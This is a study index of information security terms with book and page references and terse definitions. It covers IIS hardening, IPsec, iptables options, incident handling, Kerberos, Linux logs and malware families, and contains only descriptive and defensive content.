IDS plus something                              3     249
IDS Technology                                  3     168
IEEE 802.11 specification                       4     163
IEEE 802.11 wireless                            4     163   supports ad-hoc and infrastructure networks, 802.11a, 802.11b, 802.11g, 802.11n
IEEE 802.11i                                    4     167   accommodates two replacements for WEP (TKIP, CCMP), provides strong encryption, replay protection, integrity protection (using TKIP or CCMP), but doesn't provide authentication
IEEE 802.11x                                    4     167   provides network authentication by using EAP
IEEE 802.1x authentication - Deployment         4     168   needs three components: 1-supplicant, 2-authenticator, 3-authentication server
ieinstall.exe                                   5     182   used by Internet Explorer to run ActiveX controls when MIC is low, same as ieuser.exe == run by IE in high privilege "broker process"
ieuser.exe                                      5     182   used by Internet Explorer to run ActiveX controls when MIC is low, same as ieinstall.exe == run by IE in high privilege "broker process"
IIS (Information Internet Server)               5     233   version 7 on Server 2008
IIS (Information Internet Server)               5     233   collection of services that can be installed separately or not, including HTTP, FTP
IIS 7                                           5      15   new graphical interface, modularized, FTP-over-SSL is available
IIS access controls                             5     243   TLS / authentication requirements / IP address restrictions
IIS Basic Authentication                        5     244   compatible with all browsers, sends passwords unencrypted, use SSL with it
iis directory handler                           5     240   when a directory list is generated
IIS enable logging                              5     246
iis exchange folder                             5     242   used by the Outlook Web Access site for Exchange server
iis folders not to have                         5     242   scripts, cgi, msadc, printers, iishelp, iissamples
IIS handler                                     5     240   IIS component that handles/processes certain requests, DLL, EXE
iis handler managed code                        5     240   .NET type, C#, VB.NET code
iis handler native code                         5     240   compiled from C++ code
IIS host header                                 5     238   can host many sites simultaneously in three ways: port, IP, host header
IIS host header                                 5     238   IIS will drop processing the request & return an error msg; to create a new site open the IIS manager console, configure existing website
IIS is member server / domain member            5     234   it should not be a member of the main internal forest but of a separate forest
IIS IUSR_computername                           5     237   account for anonymous HTTP access to IIS
IIS logging                                     5     246   per-site, per-folder, per-file, by default everything will be logged
iis msadc folder                                5     242   protects a machine from the old Rain Forest Puppy RDS exploit on IIS4
IIS NTFS permissions                            5     236   System: full control, Administrators: full control, Everyone: read & execute
IIS NTFS permissions                            5     236   have separate drive volumes for OS and web content, apply a suitable security template from Microsoft or CIS to the OS volume, configure NTFS permissions by the principle of least privilege
IIS Patched Install                             5     234
IIS security logging                            5     246   NTFS permissions: allow full control to System & admin, deny full control to IUSR
IIS server manager                              5     235   to install the Web Server (IIS) role, run Server Manager to install the components needed, by check box to select adding app. like (ASP, ASP.NET, CGI)
iis staticFile handler                          5     240   when static HTML is requested
IIS urlscan.dll                                 5     245   free application firewall for IIS5/6, scans HTTP requests and rejects bad requests
IIS7 requestFilteringModule                     5     245   can be configured through XML files, like urlscan.dll
IKE internet key exchange                       4      97   protocol used by IPsec to negotiate the session details of a connection and then document them as SAs.
Incident                                        2     155   one or multiple events + harm or an attempt to do harm
Incident                                        2     157   harm or threat of harm, ex: NetBIOS scan on Unix is a threat of harm
Incident Handling                               2     153   first aid
incident handling steps                         2     159   Preparation, Identification, Containment, Eradication, Recovery, Lessons learned
Incident Handling-Containment(3)                2     166   isolate and eliminate the source of the incident
Incident Handling-Eradication(4)                2     168
Incident Handling-identification(2)             2     164   IDS, logs, system reboots, poor performance, notify correct people, utilize help desk
Incident Handling-identification(2)             2     165   assign primary handler, identify evidence
Incident Handling-Lessons learned(6)            2     172
Incident Handling-Mistakes                      2     173
Incident Handling-Preparation(1)                2     160
Incident Handling-Preparation(1)                2     162
Incident Handling-Recovery(5)                   2     170
Incident Handling-summary                       2     174
inclusive log monitoring                        3     212   a list of keywords or phrases that define events of interest, match ---> alert
incremental mode                                2     126   most powerful, most time-consuming, tries all combinations of letters, numbers, special chars
indication and warning                          3      49   a technique to determine what the attackers are going to do before they do it
indication and warning Model                    2     205
internet security & acceleration server         5     230   ISA, doesn't have VPN built in
inetd                                           6      76   super server daemon responsible for starting network services when there is a request (not at boot, as init does); a service must be listed in 2 files (/etc/inetd.conf, /etc/services)
inetd                                           6     106   Internet service daemon "super server" used to manage most of the TCP/IP daemons
inetd - examples from /etc/inetd.conf file      6     107
inetinfo.exe                                    5     240   DLLs/executables loaded into the memory address space of the web service itself
INF Security                                    5     193   service startup settings
info warfare - Offensive player                 2     207   insider, attacker, criminal, terrorists, governments, corporations
Information Centric                             2      17   identify critical assets and provide layered protection; the center is your assets, then it is protected by different layers: application, host & network.
information security cycle                      3      18   consists of three parts: prevention, detection, response
information Warfare theory                      2     202   asymmetric warfare, cycle time, players and roles, indication and warning
Information Warfare                             2     192   competition between offensive and defensive players
information warfare examples                    2     194
information warfare tools                       2     197   perception management (social engineering), malicious code, predictable response
ingress filtering                               3      53   filtering applied to incoming traffic; most firewall rules are applied to inbound traffic
init process                                    6      74   after kernel loading it is a program that provides a layer between kernel and user; it starts when the computer boots and continues till the system shuts down.
init process                                    6      83   starts some initial system processes that allow other processes to be run; these processes manage the system, e.g. the virtual memory system and process scheduler
init styles                                     6      74   SysV (as in Debian/Ubuntu and Red Hat/Fedora), and BSD (as in FreeBSD and other BSD distributions)
inittab                                         6      88   defines the run levels, and is divided into: 1st section (passes the default run level), 2nd contains (location of the script to be run before all others), 3rd (locates all run condition dirs on the system) e.g. when alt-ctrl-del is pressed, UPS poweroff, no. of ttys started
injection vector                                3      32   excessive content injected by an attacker to overwrite the return address with an address of his own.
inPrivate filter                                5     187   IE8, maintains privacy against attempts to track users via multiple sites
input attacks                                   2     257   OS command injection, buffer overflow, SQL injection, XSS
INPUT TYPE="PASSWORD"                           2     248   will show asterisks rather than display the password
insider,internal threat                         1       7   someone has access to information; consider all access to LAN resources when evaluating
Instant Messaging application                   2      41   messenger, ICQ
Insurance model                                 2      88   plan for the worst, hope for the best
integrated windows authentication               5     249   in SQL Server, authentication method using Active Directory and Kerberos
Integrity                                       4      12   proves the message has not been tampered with
intel x86 processor                             3      32   little endian; you have to convert to big endian in network connections
Intellectual Property                           2      79   Copyright:
intellectual property                           4     241   organisation owns what you develop while employed.
interim report                                  3     283   risk management step 5, project summary, asset identification, plan to recommendations
Internal PKI                                    4     118   some companies use PKI as the basis for NAC solutions.
Internet                                        1       7   connects many LANs, MANs, WANs together in the world's largest network.
Internet explorer                               5       8   IE7 not included in XP SP3, upgrading IE must be performed separately
internet explorer                               5     183   99% of IE settings via GP; a few changes will block most exploits even without patches, but these changes break functionality.
internet explorer 8                             5      12   included in Windows 7 by default
internet explorer hardening                     5     184   *******2 pages*******
internet explorer protected mode                5     181   on: when MIC of explorer is low, off: when explorer is run by administrator
internet explorer protected mode                5     182   special folder when running with MIC: low
internet explorer security                      5     181   IE8 or later launches a separate process iexplore.exe
internet printing buffer overflow               5     241   requires *.printer mapping on Win2000
interspect                                      3     251   internal security gateway that builds on SmartDefense technology
Intractable - discrete logarithm problem        4      54   a^x mod n = b, mod (means remainder), very difficult to solve, used by: ElGamal, Diffie-Hellman, Schnorr signature scheme, Digital Signature Algorithm
Intractable - discrete logarithm problem applied to elliptic curve   4      55   hard problem, uses Elliptic Curve Cryptosystems (ECC) which offer [higher speed, lower power, tighter code], used by: Elliptic Curve ElGamal, Elliptic Curve Diffie-Hellman, Elliptic Curve Schnorr signature scheme, Elliptic Curve Digital Signature Algorithm (ECDSA)
Intractable - factoring integer problem         4      53   difficulty of factoring a large integer into its two prime factors, hard problem solved by trial & error, used by RSA
Intractable problem example                     4   51-52   very hard problems that can't be solved in polynomial time (asymmetric encryption), like exponential O(2^n), superpolynomial, cubic-time algorithm, exponential-time algorithm
interrupts                                      3      39   calls for software or hardware needs to be handled; an attacker can use them to call malicious code
IP (Internet Protocol)                          1      49
ip checksum                                     1     158   16-bit one's complement of the IP header only
Ip timestamp                                    1      51   tells routers to write a timestamp into the options field
IP(Instruction Pointer)                         2      24
IPC$                                            5     105
ipchains                                        6     175   old built-in firewall
ipconfig.exe                                    5     228
ipconfig.exe                                    5     283   variety of IP settings
IPFW                                            6      14   personal firewall installed and on by default in Mac OS
ipfwadm                                         6     174   old built-in firewall
IPS                                             3     229   will try to stop attacks before they are successful, but it prevents passively, unlike a firewall.
ips -- how it stops attacks                     3     229   by: sending RST & modifying firewall rules.
ips -- what IPS is not                          3     230   ……….
IPS & IDS                                       3     229   IDS is deployed PASSIVELY, while an IPS is traditionally deployed INLINE
IPSec                                           4      92   RFC 2401, scales from small to very large networks, commonly implemented.
Ipsec                                           5     220   mutual authentication, encryption, packet signing, ipsecpol.exe, ipseccmd.exe, netsh.exe
IPSec - authentication header (AH)              4   93-94   integrity, no confidentiality, anti-replay, origin authentication
IPSec - internet key exchange IKE               4      97   ISAKMP (Internet Security Association and Key Management Protocol), protocol used by IPsec to negotiate the session details of a connection and then document them as SAs.
IPSec - encapsulating security payload (ESP)    4   94-95   integrity (not perfect integrity), confidentiality, anti-replay, origin authentication
IPSEC - Headers                                 4      92   Authentication Header (AH), Encapsulating Security Payload (ESP)
IPSec - mode types                              4      96   tunnel mode, transport mode
IPSec - NAT                                     4     102   NAT is incompatible with IPsec AH, but NAT can be used with IPsec ESP in two modes, tunnel and transport
IPSec - Null algorithm                          4      95   it does nothing to the msg, used if you want to turn off encryption on IPsec
IPSec - Replay attack                           4      92   is to copy the msg from the network & retransmit it even if the attacker can't understand it; this would cause undesired results, ex: retransmitting a request packet to transfer $1000
IPSec - Security Associations                   4      97   critical part of IPsec, they document the security services (transforms) that are used by a specific IPsec connection, & must be agreed by both sides of the IPsec connection
IPSec - session establishment                          97   the two sides of the connection must agree on what options they are going to use, Session Association
IPSec - Tunnel mode & AH                        4      96   authentication, integrity
IPSec - Tunnel mode & ESP                       4      97   encryption, authentication.
ipsec & Group policy                            5     223
IPSec => IKE => Oakley                          4      97   key exchange
IPSec => IKE => SKEME                           4      97   secure key exchange mechanism, extends the capabilities of Oakley.
IPSec => IKE => ISAKMP                          4      97   key management
IPSec- AH => ICV(integrity check value)         4      93   to prevent spoofing the IP address and to verify integrity, that no one has tampered with the info.
ipsec client respond only                       5     224   PC will not require or request IPsec, but IPsec is enabled; GPO option
ipsec commands                                  5     221   block all packets: netsh.exe ---> netsh.exe ipsec dynamic add rule srcaddr=any dstaddr=any ,, allow ICMP packets ...… ,, allow packets to/from TCP port 80 ……… ,, to get rid of the policy & its rules …..
ipsec request                                   5     223   PC will attempt to use IPsec; if not, it will fall back to plain text for backward compatibility
ipsec require in Organization Unit              5     225   secure server (require security), server (request security)
ipsec secure server require security            5     225   IPsec policy with 3DES mutual authentication, only IPsec is allowed, GPO option
ipsec server request security                   5     225   will request mutual authentication but will fall back to plain text if the client doesn't support IPsec
ipsec+l2tp vpn                                  5     226   NAT problems, especially with more than 1 NATting device
IPSec=>phase one => aggressive mode             4      98   does not check the identity of the participant
IPSec=>phase one => main mode                   4      98   checks the identity of the participant
IPSec=>phase two => quick mode                  4      98
ipseccmd.exe                                    5     221   Windows XP, download from Microsoft, to configure IPsec
ipsecpol.exe                                    5     221   Windows 2000 resource kit, to configure IPsec
iptables                                        6     175   current packet filtering; it is modular (can check packets that are not part of iptables by adding a new test to the kernel without reboot and defining the action to take, fast), & can work as a NAT box.
iptables {checks} {action} command              6     176   perform this action if the packet matches all checks, else continue to the next rule; so it builds up the kernel table
iptables -A INPUT …                             6     180   append this rule to a rule chain (put it at the bottom)
iptables basics                                 6     176   the iptables cmd tells the kernel what to check and the kernel does the actual check (from the top of the rules list down) and if it finds a match, takes the action
iptables -D                                     6     179   use the same command with the -I option to delete the rule
iptables -d (or --destination) ip or ip/mask    6     176   destination IP or network
iptables downside                               6     175   focuses on packet headers only
iptables -dport                                 6 176,180   destination port (single port or port range as start:end)
iptables -i                                     6     181   only match if the packet comes from a specific interface
iptables -I FORWARD|INPUT|OUTPUT                6 177,179   FORWARD --> filter packets to a server accessible by another NIC on the firewall (going through the system), INPUT --> filter packets destined to the firewall (coming into the system), OUTPUT --> filter packets originating from the firewall (created by the system)
iptables -I FORWARD|INPUT|OUTPUT                6 179,181   iptables -I inserts at the top of the current rule list; iptables -I chain ruleno (put this in a specific chain and make it no. x)
iptables -j DROP|ACCEPT|REJECT|LOG              6 176,181   action taken (ACCEPT --> accept the packet, REJECT --> reject the packet and notify the sender, DROP --> silently ignore the packet, LOG --> log the packet and continue processing more rules)
iptables -j LOG                                 6     180   log the packet, and continue processing more rules in this chain; allows the use of --log-prefix & --log-level
iptables -L -nxv | less -S                      6     179   to see the active firewall rules (-L lists the current filter rules)
iptables --limit                                6     180   the max. matching rate given as a number followed by (/second, /minute, /hour); if this option isn't used & -m limit is used --> the default is 3 hours
iptables --log-level                            6     181   log using a specific log level, 7 is a good choice
iptables --log-prefix "text"                    6     181   when logging, put this text before the log msg
iptables -m limit                               6     180   require the rule to match only a limited no. of times (useful for limiting a logging rule), permits the use of the --limit option
iptables -m state                               6     180   allow filter rules based on connection state, permits the use of the --state option
iptables- NAT                                   6     178   two built-in chains to place NAT policy rules: pre-routing chain --> NATs packets when the destination address of the packet needs to be changed, post-routing chain --> NATs packets when the source address of the packet needs to be changed
iptables -o (--out-interface)                   6     181   outname + network interface name (+ is a wildcard)
iptables -p tcp                                 6     176   protocol used
iptables -p udp -I FORWARD -dport 1434          6     182   to block worm traffic
iptables -s (or --source) ip or ip/mask         6     176   source address IP or network (used to block an attacker)
iptables -sport                                 6     182   source port (single port or port range as start:end)
iptables --state                                6     180   define the list of states for the rule to match on (NEW, RELATED, ESTABLISHED, INVALID)
iptables -v                                     6     181   display more info (useful if you have similar-looking rules)
IPv4 header                                     1      51   minimum 20 bytes, maximum 60 bytes
IPv4 header - bytes number                      1      54   byte 9: protocol number, bytes 10,11: protocol checksum
IPv4 header- fields -                           1      52
IPv4 options - strict source routing            1      51   allows the sender to specify the exact route to the destination
IPv4 options- loose source routing              1      51   allows the sender to specify a list of routers a packet must pass through; it may also traverse other routers if required
IPv4 options- record route                      1      51   tells routers to add their IP address into the options field
ipv4 over ipv6 (translation)                    1      82
ipv6 features                                   1      82
ipv6 address space                              1      80   340 undecillion addresses
ipv6 autoconfiguration                          1      82   based on the local MAC address and information from the default gateway
ipv6 fixed header size                          1      82   40 bytes of fixed size
ipv6 header                                     1      85   flow label and traffic class are used for QoS
ipv6 network prefix                             1      83   FE80 local network, FF00 multicast traffic, 2001 large ISP interdomain, 2002 IPv6-to-IPv4 gateways
ipv6 next header                                1      82   it's like the protocol field in IPv4, currently supports AH and ESP
ipv6 over ipv4 (tunneling)                      1      82   uses IPv4 protocol number = 41
ipv6 vs ipv4                                    1      81   IPv6 supports authentication, encryption and quality of service
IRC (Internet Relay Chat)                       2      38   used as a channel that a worm uses to communicate with its creator
irreversible encryption                         2     117   one-way hashing, one-way encryption
ISAKMP                                          4      97   key management
ISC (internet storm center)                     3     222   is a powerful tool for detecting rising internet threats (isc.sans.org)
ISDN                                            1      18   service profile identifier = 10 digits, ISDN connection identifier = 4 digits, problem: backdoor
ISMS                                            2      71   is the process by which an org formulates security policy based on ISO 17799
ISN guessing drawback                           3      15   it only works with idle machines, so you need a machine that doesn't accept a lot of connections
ISO 17799                                       2      59   information security standard
ISP (Internet service provider)                 1       7   responsible for integrity and connectivity of all LANs, WANs, MANs
Issue-specific Policies                         2      67   ex. user authentication, password policy, acceptable use, etc.
Issue-specific Policies                         2      71   password procedures, internet usage guidelines, not broader than program policy
Issue-specific Policies Example                 2      77   NDA and Copyright
IW - Confidentiality attacks                    2     209
IW - Cycle time                                 2     204   time to decrypt info, time between vuln and patch and release of worm
IW - Decrease value to defense                  2     210   decrease integrity, decrease availability
IW - Defense is not dominant                    2     211
IW - increase value to offense                  2     209
IW - indication and warning                     2     205
IW - offensive operation goals                  2     208   is to cause harm, win-lose situation, more valuable to offense, less to defense
IW - Offensive player                           2     207   insider, attacker, criminal, terrorists, governments, corporations
IW (Information Warfare)                        2     192   competition between offensive and defensive players
IW -Asymmetric warfare                          2     202   small investment has very large effect
jackal                                          3     117   uses SYN/FIN scans to evade firewalls
java applet (Signed java applet)                2     239   allows the user to assign a policy that offers control (ex: author identity, source code)
joeware                                         5     284   Active Directory tools
joeware                                         5     284   tools to force passwords to expire, list groups of a user, unlock user accounts
John the Ripper support                         2     126   DES, 2DES, BSDI, MD5, Blowfish, Andrew File System (AFS), NTLM passwords
John the Ripper cracking modes                  2     126   each mode cracks passwords in a different way
John the Ripper+MD5                             2     125
john.ini                                        2     126
Julius Caesar                                   4       7
jumbo-sized frames                              1      11   optimize network timing for use of maximum bandwidth efficiency
Jump Bag content                                2     163
kerberos                               5   36    by default, AD is the key distribution center for Kerberos; your Kerberos key is derived from your password; Kerberos applications in Windows don't need to be kerberized like in Unix; Kerberos is found in IKE, RSVP but not in FTP, telnet; Kerberos is faster than NTLM and clients can cache and reuse their tickets
Kerberos - Authentication              2   113   uses Kerberos V5, doesn't send password through the network
kerberos cracker                       5   37    if the initial Kerberos exchange is captured it can be vulnerable to brute force; Kerberos is vulnerable to brute force, ticket request is encrypted with the user password
kerberos port numbers                  5   208   tcp/udp/88,tcp/udp/464 for kerberos change password,tcp749,tcp/2053
kerberos process                       5    36
Kerberos tickets                       5   171
kerberos used protocols                5    36   Kerberos-found in SMB/CIFS,RPC,LDAP,HTTP,dyn DNS,IPSEC ,IKE,RSVP, NOT FOUND in FTP , TELNET
kerberos&NTLM2                         5   172   LAN Manager authentication level GPO security option; NTLMv2 not vulnerable to Cain + RainbowCrack; Kerberos uses UDP
kernel                                 6   25    memory-resident part of the OS loaded in memory at boot (manages HW and the executing processes)
kernel                                 6   82    software responsible for (initializing and managing HW resources, handling communication between applications and HW devices)
kernel services                        6   26    File system,low level network protocol support ( ip),memory and process management
key catcher                            1   214   a small 2" device to capture key stroke ,memory up to 8 mbyte
Key focus of Risk                      2    8    CIA !=Disclosure,Alteration,Destruction
Key Length Comparison                  4    71   compare keys of: 3DES, AES, Diffie-Hellman, RSA, ECC key length.
key recovery                           4   122
Keystream of stream cipher             4    24   keystream length must = plaintext length, generated at both sending and receiving ends.
kismet                                 3   148   intrusion detection tool, wireless passive scanner, attacks against LEAP protocol
kismet color codes                     3   149   green=secure,red=factory settings,
kismet interface                       3   149
kismet_drone tool                      3   148   lightweight kismet, deployed in client/server infrastructure to monitor wireless from attacks
Known Plaintext attacks                4   73    cryptanalyst knows: 1 plaintext + 1 ciphertext; wants to know: the key, or another algorithm to decrypt any msg encrypted with a key the cryptanalyst knows
kuang2 virus                           3    65   all infected systems listen to the 17300 tcp port
L2tp (layer two tunneling protocol)    5   226   assists IPsec in tasks such as user authentication and RADIUS policy enforcement
LaBrea Trapit                          3    89   Honeypot tool
Lan                                    1    6    is owned by single entity,trusted users access network and server resources
Lan man                                2   128   hashing algorithm; two identical passwords will have the same encryption
Lan Manager Authentication Level GPO   5   172   send NTLMv2 response only , refuse NTLMv1
Lan threat                             1    6    disgruntled employee or trustworthy employee who was fooled.
last command                           6   124   uses the wtmp log; its output is: (userID, terminal ID, remote host ID, connection date, time on, time off, session time), and it is read in reverse order
LAST-ACK                               3   58    the other host received the FIN and acknowledged it
lastlog                                6   127   binary log file, keeps track of each user's most recent login date and time, records the initiating IP address, displayed each time the login program is run
Latency                                 2   271     time between making request and seeing result
layer independence                      1    46     makes it faster to write network programs but makes security weaker
lcredit=$                               6    60     minimum number of lowercase letters is $, in /etc/pam.d/system-auth as a pam_cracklib argument
LDAP                                    5   208     cleartext: tcp389, LDAP SSL encrypted: tcp636, global catalog: tcp3268, global catalog encrypted: tcp3269
least privilege - OPSEC                 4   242     ensures that only the minimum required access rights are given at any time.
Leaves Worm                             2    38     backdoor,scan for infected subseven trojan,authen it using master pass,remove it
Legal aspects of Incident Handling      2   174
Legal system                            2   176     common law, civil law
legion                                  3   113     can detect unprotected netbios file shares
libcap                                  1   138
liberal approach                        2    56     more informal but high risk
Libpcap library                         3   195     open-source, designed to retrieve data from the kernel and pass it to the application layer (TCPDump, Linux)
Libpcap Products                        3   195     Shadow, Snort, Cisco IDS and NFR
libwhisker                              2   275     has an impressive list of CGI vulnerabilities, can brute-force URLs, muck with cookies, etc.; foundation of the Whisker scanner
lightweight directory access protocol   5   208     LDAP, default protocol for searching and editing the Active Directory database
lilo.conf                               6    85     one type of boot loader; add 2 lines at the top of the file to set a boot loader password (password=<your password>, then restricted)
limited broadcast                       1    62     not passed by router 255.255.255.255
linear time                             4    51     O(n)
linus torvalds                          6    16     creator of the Linux kernel (rewrote Minix for the Intel 386 platform); his code represents only 2% of the kernel now
linux and DOS corresponding commands    6   32,33
linux file permission                   6    34
linux importance                        6    17
linux live cd                           6    23     allows you to test drive it, no HD required or installed; excellent for forensic work and troubleshooting, also used for rescue and recovery
linux other security options            6   199     Boot Loader Password, PS, Netstat
linux proxy applications                6   175     squid (Web and FTP), bind (for DNS), postfix (for e-mail). & can coexist with Iptables
linux vs. cygwin                        6    9      cygwin not for something you can depend on to work consistently
Linux Worms                             2    28     Ramen,lion,
Lion                                    2    29     open root shell&trojaned version of SSH,can't clean,use vuln BIND name server
List based Access control               2   110     associates users and their privileges with each object
list of resource kits                   5   272     *********3 pages **********
list of resource kits 2                 5   275     ******** 2 pages **********
list.exe                                5   315     like the Linux less command, opens large files but doesn't load the entire file at once
little endian                           3    32     the most significant bit is on the right side of a byte 00000000x
live Distro                             6    23     as live CD but for any bootable media as usb,floppy,external HD,ipod
LMCompatibility Level registry                        2   146
lmhosts file                                          1    72   contain mapping for netbios to Ip address
loadable kernel modules                               3    41   are called device driver files, used in creating rootkits
local accounts-Management                             5    25   accounts applet in Control Panel, Start > Administrative Tools > Computer Management, NET.exe
local GPO (Group Policy Object )                      5   153   MMC snap-in, current PC settings except NTFS and registry key ACLs, applied automatically
local group policy object (GPO)                       5   155   can import security template in it ,some setting in template not in the GPO
LOCKD                                                 6   105   RPC service run by both client and server, it handles file locks
locking useraccount after fail logins                 6    62   in /etc/pam.d/system-auth in pam_tally module
locks                                                 1   238   traditional ,cipherlocks,smartcard,smartcard with passcode,biometrics
log consolidation                                     5   328   central database for all logs,psloglist.exe,dumpevt.exe
log file monitoring                                   2   271   monitor access log and error log.
log files                                             6   122   Binary Log Files (utmp, wtmp, lastlog), Text Log Files (history files, sulog, httpd, syslogd, messages/syslog, secure, ftplog, maillog)
log monitoring                                        3   212   inclusive or exclusive
log size in vista/7                                   5   326   no problem because xml logs can be compressed
log size in xp /2003                                  5   326   maximum of 4.2 Gb but actually 300mb
logevent.exe                                          5   318   write your own entries to event log using this command line tool
LOGEVEnt.exe                                              318
logging interval                                      5   247   use local time for file naming and rollover
Logic bomb inside lan                                 1    6    a threat that deleted all files inside company so they lost a lot of money because of lan trust.
logic bombs                                           3    28   small programs or sections of a program triggered by some event as a date or a time
logical topology                                      1   10    the process that protocol follows to send data regard less how physical it looks like (Ethernet, Token Ring)

logrotate                                             6   147   The logrotate program is a log file manager. It is used to regularly cycle (or rotate) log files by removing the oldest ones from your system and creating new log files. It may be used to rotate based on the age of the file or the file's size, and usually runs automatically through the cron utility. The logrotate program may also be used to compress log files and to configure e-mail to users when they are rotated.
logrotate use it instead of /etc/cron.daily/syslogd   6   149
logs wrapping options                                 5   327   three options,overwrite events as needed,overwrite older than x days,don't overwrite
logsurfer                                             6   152   log alert program
logwatch                                              6   152   log alert program
long-term solutions                                   3   286   involve redesign of infrastructure and increased safeguard solution cost
LOPD                                                  2   178
low-land stack                                        3    33   starts with 00 in the address, would indicate a Windows box, limits size of payload
ls                                                    6   212   listing the contents of a directory
LSPP                                                  6   205   MLS enforce the bell-la padula mandatory access and is used in LSPP environment
MAC (Mandatory Access control)                        2   109   user must have clearance to access data and user can't give it to others, e.g. SELinux; requires a lot of work to maintain
MAC address                             1     65
MAC OS file vault                       6     14    strong encryption user home dir it use 128-bit AES
MAC OS password assistant               6     14    grades strength of passwd red-->weak yellow --> passwd ok green--> strong passwd
mac os x                                6     7,12  UNIX/BSD and also has a server edition; 7% market share, 2nd most popular OS; it is more intuitive for beginning users than Windows and Linux
macafee hips                            3     249   ids+something, use system call interception,was Entercept product
MAE (metropolitan area exchange )       1       7   large peering points to provide connectivity between ISPs.
maillog                                 6   144,145 maillog sends its log to syslogd (date time hostname program_name : msg_sent_to_syslogd); the first field in the msg is the queue id (if there are multiple entries for a msg, each will be associated with the same id)
maillog - queue identification number   6     145   id no assigned to the msg, appear in msg id of the mail in mail header
malicious code                         3      28   logic bombs, trojan horses, trap doors (backdoors)
Malicious Browser content               2      36   ex:spyware(trojan,keystroke monitor),vuln in:activeX,java applet,java script
malicious mobile code                   2      20   malware that replicate from PC to PC
Malicious SW                            2      20
Malware                                2      20   is SW written with malicious intent to perform actions without user permission
Malware - Analysis                      2      45
Malware - Mitigating                    2      45
Malware - user education and policy     2      46
Malware Capability                      2      37   destruct data,leaking confidentiality,backdoor,
Malware Defense technique              2      42   activity monitoring program, malware scanner, file integrity check, stripping e-mail attachments, patching
Malware propagation techniques         2      39   removable media, e-mail attachments, web browsing, network vulnerabilities, instant messaging, peer-to-peer
Man                                     1       7   spans a city or town,use high speed media,connect several facilities together
man <command>                           6     226   to read the manual pages for any given command
managing cooling                       1     229   increased server density means more heat, temperatures vary from place to place
managing power                         1     229   power needs are increasing, server density is increasing, it takes a long time to increase capacity
Mannerisms                              2     144   keystroke,hand written,tread
mantraps                                1     241   a secure portal that require the individual to identify himself to pass
Macro Virus(Worm)                      2      22   uses instructions that can be interpreted within an application (Word, Excel)
Marker virus                           2      37   info leakage, obtains info from the victim's system registry and sends it through FTP
MAU (Multi-station access unit)         1      13   central device passes tokens serially from 1 station to the other ,one way and in order.
MBR function                            6     81      usually runs a more complex boot loader from elsewhere on the system disk like: GRUB (Linux), openboot (Unix)
MBSA features                           5     300     4 pages
mbsacli.exe                            5     262     Microsoft Baseline Security Analyzer, patch scanning, scriptable
mbsacli.exe                             5     304     scan remote hosts for missing hotfixes,analyze data and return it in ftp,mail,smb
mbsacli.exe /Id "report name"           5     305     Display a detailed report
mbsacli.exe /l"ell"                     5     305     List all the reports that are available
mbsacli.exe /r "ip-range" /f "file"     5     304     /r for ip address range,/f for redirect output to file
MCS                                     6     205
MD2 - Message digest 2                      4   32    128-bit hash
MD4 - Message digest 4                      4   32    designed for fast processing in software, also 128-bit hash
MD5                                         2   127   $1$ means it hashes with MD5; Unix salted MD5
MD5 - Message digest 5                      4   32    slower than MD4, but works on weaknesses reported in MD4; 128-bit hash
media access protocols                      1   10    protocols clarify the rules for sending signals to each other in a connected network; Ethernet, Token Ring
meeting point                               1   219   choose easy distant walking
meeting point leader                        1   220   account for employees,first one out
Melissa virus                               2    37   info leakage ,send doc by mail to attacker
Message digest                              4   32
metabase                                    5   309   IIS separate registry, you have to include it in a system snapshot
MIC (Mandatory Integrity Control (Label))   5   117   low for temp internet, medium for users, high for admins, services run as System == Low label --> Internet Explorer == High label --> administrative privileges == Medium label = default
MIC (Mandatory Integrity Control (Read))    5   117   by default doesn't restrict read or execute
MIC (Mandatory Integrity Control (Rule))    5   117   process can't edit securable object unless the object is the same or less MIC label
MIC (Mandatory Integrity Control )          5   116   has label(system,high,medium,low) on each object(folder,registry key,shares)
MIC (Mandatory Integrity Control)           5   116   perserve integrity of os files,registry,data between applications,previously WIC == enable by default in win vista
MIC doesn't restrict Read/Execute           5   117
MIC prior to ADCL                           5   117
Microsoft Baseline Security Analyzer        5   300   free, takes a range of IPs to scan; another dangerous service in SQL; launch MBSA
microsoft office kit                        5   157   has templates to configure all office products,word,excel,..
microsoft resource kits                     5   271   documentation , scripts , tools , for :: IIS,SMS,SQL Server,Exchange
Microsoft Security Assessment Tool          5   261   200 questions, makes a report with a prioritized action list, perspective of the CISO
Microsoft System Center Operation           5   329   Mom server ,centralize log ,watch servers,extract event logs and audit data
microsoft update                            5   59    a web site loads an ActiveX control into IE to scan the system for missing updates == disadvantage is that it is not automatic update == scans for missed hotfixes and installs them ==
Microsoft, NIST, DISA, NSA                  5   146   Security Templates from Microsoft, NIST, CIS --> debugged and tested
MIME encoding                               2   228
min password policy                         5   163   prevents users from recycling their old favourite password
minlen=$                                    6    60   minimum length of password must be $, in /etc/pam.d/system-auth as a pam_cracklib argument
Mission Statement                           2    55   the idea behind the brand, what customers expect from you, the way we want people to view us
mitnick-shimomoura                          3     4   Christmas 1994, on Tsutomu Shimomura's home network; information security professional
mitnick-shimomoura                          3     7   Shimomura had 3 machines running Solaris 1 (SunOS 4)
mitnick-shimomoura defense                  3    17   detection, patching, disable unused services, network vulnerability scan, HIDS, NIDS, firewalls
mkdir <newdir_name>                         6   218   make a directory
MLS                                       6   205   enforces the Bell-LaPadula mandatory access model and is used in the labeled security protection profile (LSPP) environment
MLS/MCS                                   6   205   each level is a sensitivity-category pair with category being optional; when using a category the level is written as sensitivity:category-set (s0:c0.c1023 --> from c0 to c1023); if category is not used the level is written as sensitivity
MLS/MCS in fedora 10                      6   205   have only one sensitivity s0 and it support up to 1024 category c0-c1023
MMC.exe                                   5   146   edit security template
modems issue                              3   104   auto-answer,bi-directional connection,connection to external isp
modularization in server 2008             5    14   easy addition/removal of roles and features
mom server                                5   329   centralize log,watch servers,extract event logs and audit data
monster.com                               4   265   is an employment website; search for jobs, then guess the company infrastructure
Morris Worm                               2    27   availability attack (DoS), used holes in the Unix sendmail program and finger daemon
moisture detectors                        1   227   a detective control used to detect water/flood, installed on surfaces
mount point                               6    27   is where the computer puts the file system so it can access it
MPLS (Multiprotocol Label Switching)      1    18   layer 2.5 technology, supports IP, IPv6, VoIP
MSAT                                      5   261   Microsoft Security Assessment Tool, 200 questions, report
msblaster                                 3   118   Aug-03
MS-CHAPv2 option with PPTPv2              5   229
MSDE                                      2    30   microsoft desktop exchange
MS-SQL udp port 1434                      6   182
MTD(maximum tolerable downtime)           2    92   how long can your system be compromised without affecting the company
multi resolution filter                   3   242   at NIPS, simple tests are applied to traffic, then more tests to it; this enhances system performance
